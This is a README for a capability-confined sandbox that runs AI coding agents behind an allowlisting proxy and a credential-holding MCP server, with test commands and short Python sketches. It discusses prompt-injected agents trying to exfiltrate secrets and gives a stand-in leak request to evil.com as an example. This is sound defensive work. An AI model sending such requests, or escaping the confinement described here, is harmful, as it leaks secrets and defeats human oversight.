A capability-confined sandbox for running AI coding agents in YOLO mode. Instead of trusting the agent to behave, you make harm structurally impossible. The worst a fully compromised or prompt-injected agent can do is open a pull request on a private repo — it cannot exfiltrate secrets, reach arbitrary hosts, or touch the cloud directly.
This repo is two things:
- `PROMPT.md` is the brief that defines the system. This is the artifact that matters: hand it to a capable coding agent and it can build a runtime like this one. It's a refined version of the original idea with the security mistakes corrected.
- `sample-implementation/` is one working, tested implementation of that brief (Docker + Squid + a stdlib MCP server), with a test suite that proves the security properties hold.

How the confinement works:

- The agent sits on an internal-only network: it has no internet route at all.
- Its only way out is the proxy, which allows a short list of trusted domains and denies everything else. This, not an "allow GET / block POST" filter, is what actually stops exfiltration (a `GET evil.com/?secret=...` leaks just fine).
- The cloud credential lives only in the MCP server. There is no `az` CLI in the agent, so the only path to the cloud is through MCP tools that return derived, scrubbed results. The agent never sees the secret.

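
The difference between a method filter and a destination allowlist can be sketched in a few lines of Python. This is not the proxy's actual configuration, only an illustration of the decision it makes; the `ALLOWED_DOMAINS` set, the subdomain-matching rule, and the function names are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist for illustration; the real list lives in the proxy config.
ALLOWED_DOMAINS = {"github.com"}


def host_allowed(host: str, allowed=ALLOWED_DOMAINS) -> bool:
    """True if host is an allowed domain or a subdomain of one (assumed rule)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)


def method_filter(method: str, url: str) -> bool:
    """Weak policy: allow reads, block writes, ignore the destination."""
    return method.upper() in {"GET", "HEAD"}


def destination_filter(method: str, url: str) -> bool:
    """Allowlist policy: decide on the destination host, whatever the method."""
    host = urlsplit(url).hostname or ""
    return host_allowed(host)


leak = ("GET", "https://evil.com/?secret=hunter2")
print(method_filter(*leak))       # True: the secret leaves in the query string
print(destination_filter(*leak))  # False: the host is not on the allowlist
```

Under the method filter the secret escapes through an ordinary read request; under the allowlist the request never leaves, regardless of method.
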
See PROMPT.md for the two-layer mediation model (proxy floor + MCP high-trust lane)
and the full acceptance criteria.

To run the sample implementation:

    cd sample-implementation

    # Build and start the three containers (agent, proxy, mcp-server)
    docker compose build
    docker compose up -d
    docker compose ps          # all three should be "Up"

    # Prove the security properties (runs commands inside the agent container)
    ./tests/run-tests.sh

    # Exec in and play the part of the agent
    docker exec -it mar-agent bash
    #   curl https://api.github.com/zen      # allowed
    #   curl https://example.com             # blocked by the proxy
    #   mcp_call azure_whoami                # cloud access without the credential
    #   mcp_call web_fetch url=https://api.github.com/zen

    # Watch egress decisions live
    docker exec mar-proxy tail -f /var/log/squid/access.log

    # Optional: give the agent a real GitHub PAT (read + create-PR, private repos)
    GH_TOKEN=ghp_xxx docker compose up -d
    ./tests/run-tests.sh       # now also exercises GitHub access

    # Tear down
    docker compose down

The test suite checks the following properties:

| # | Property |
|---|---|
| 1 | Agent has no direct internet route (bypassing the proxy fails) |
| 2 | Egress is domain-allowlisted (github allowed, example.com denied) |
| 3 | The cloud credential is never visible to the agent |
| 4 | A vulnerable tool's secret leak is scrubbed by the MCP server |
| 5 | Exfiltration blocked — GET and POST to a non-allowlisted host fail |
| 6 | No az CLI in the agent; GitHub access is scoped (PAT) |
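
Property 4 can be illustrated with a small sketch of output scrubbing. It assumes the server knows the exact secret values it holds and redacts them from every tool result before returning it; `CREDENTIAL`, `vulnerable_tool`, and `call_tool` are hypothetical names, not taken from the sample implementation.

```python
# Hypothetical credential value, held only by the server process.
CREDENTIAL = "s3cr3t-value"


def scrub(text: str, secrets: list[str]) -> str:
    """Replace every occurrence of each known secret with a placeholder."""
    # Longest first, so a secret that contains another is redacted whole.
    for secret in sorted(set(secrets), key=len, reverse=True):
        if secret:
            text = text.replace(secret, "[REDACTED]")
    return text


def vulnerable_tool() -> str:
    """A buggy tool that echoes the credential into its output."""
    return f"debug: auth header was Bearer {CREDENTIAL}"


def call_tool(tool) -> str:
    """Run a tool and scrub its result before it reaches the agent."""
    return scrub(tool(), [CREDENTIAL])


print(call_tool(vulnerable_tool))  # debug: auth header was Bearer [REDACTED]
```

Exact-string redaction like this would not catch an encoded copy of the secret (base64, for instance), which is one reason the server has to stay small enough to audit.
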

This is a POC that demonstrates the model, not a finished product. Notably: the proxy
trusts the `CONNECT` hostname without TLS-SNI verification (production wants
`ssl_bump peek` + SNI allowlisting), the MCP server is the trusted computing base and must be
kept small and audited, and the MCP transport here is a minimal hand-rolled JSON-RPC
subset rather than the official SDK over Streamable HTTP. These are called out in
`PROMPT.md` and in code comments so they aren't mistaken for solved problems.
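
To give a sense of scale for a "minimal JSON-RPC subset", here is a rough sketch of a single-method dispatcher. It is not the repo's server: the `handle` function, the `TOOLS` table, and the value returned by the hypothetical `azure_whoami` stub are assumptions for illustration. The `tools/call` method name follows MCP's convention and the error codes are the standard JSON-RPC 2.0 ones.

```python
import json


def azure_whoami() -> dict:
    # Hypothetical stub: returns a derived result, never the credential itself.
    return {"account": "example-subscription"}


# Tool table for the sketch; a real server would register its audited tools here.
TOOLS = {"azure_whoami": azure_whoami}


def _error(request_id, code: int, message: str) -> str:
    return json.dumps({"jsonrpc": "2.0", "id": request_id,
                       "error": {"code": code, "message": message}})


def handle(raw: str) -> str:
    """Handle one JSON-RPC 2.0 request string and return the response string."""
    try:
        request = json.loads(raw)
    except json.JSONDecodeError:
        return _error(None, -32700, "Parse error")
    if not isinstance(request, dict):
        return _error(None, -32600, "Invalid Request")

    request_id = request.get("id")
    if request.get("method") != "tools/call":
        return _error(request_id, -32601, "Method not found")

    params = request.get("params") or {}
    tool = TOOLS.get(params.get("name"))
    if tool is None:
        return _error(request_id, -32602, "Unknown tool")

    result = tool(**params.get("arguments", {}))
    return json.dumps({"jsonrpc": "2.0", "id": request_id, "result": result})


request = {"jsonrpc": "2.0", "id": 1, "method": "tools/call",
           "params": {"name": "azure_whoami"}}
print(handle(json.dumps(request)))
```

A dispatcher this small is easy to audit, but it skips the initialization handshake, notifications, batching, and the Streamable HTTP transport that the official SDK provides.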
